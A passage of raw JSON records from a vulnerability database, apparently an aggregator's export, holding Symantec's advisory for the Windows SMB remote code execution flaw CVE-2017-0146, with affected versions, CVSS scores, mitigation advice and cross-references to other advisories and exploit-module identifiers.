"1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:23", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-06-08T19:05:23", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2016 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "2fd4bebabbccdd3063f9c07be91fcd13"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ab861885dbe02d09a3a2208dd9731d62"}, {"key": "cvss", "hash": "3c236091754d2db00c1c42f811b3ada4"}, {"key": "description", "hash": "5c1cd1e39070996194f8d33a24db02ff"}, {"key": "href", "hash": "f51242d5df99f0b16f54bc3140a1a24a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "66d6cc2a78eb79d5239c273496f3915f"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96707", "hash": "340caacebac5e285b90fc8d68db2f63ea4c5e12588b85abb65ada90528bdd30d", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96707", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0146"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 9.0}}, "hash": "a081bda7eb2c792f9cd4bdfa1315568b75984a8fc0be9116060361dfd4bf5a82", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96707", "id": "SMNTC-96707", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 78}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T16:12:10", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0146"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-03-12T16:12:10", "rev": 2, "value": 9.4, "vector": "NONE"}}, "hash": "41b3a29610ed25da2ec07a6c2dbc02f8d901e510cf4db130fcba0c783f5f67be", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "52ac1b70370c64e0d47bc24ef31b807b", "key": "href"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "b5c29791cd9e61202953bd2641d4e401", "key": "title"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96707", "id": "SMNTC-96707", "immutableFields": [], "lastseen": "2018-03-12T16:12:10", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 323}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T16:12:10"}], "viewCount": 357, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.4, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "52ac1b70370c64e0d47bc24ef31b807b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "b5c29791cd9e61202953bd2641d4e401"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}], "checkpoint_advisories": [{"id": "CPAI-2017-0419", "vendorId": null, "hash": "95d1a0c8b50ed0b6ba08d3b76da244a6", "type": "checkpoint_advisories", 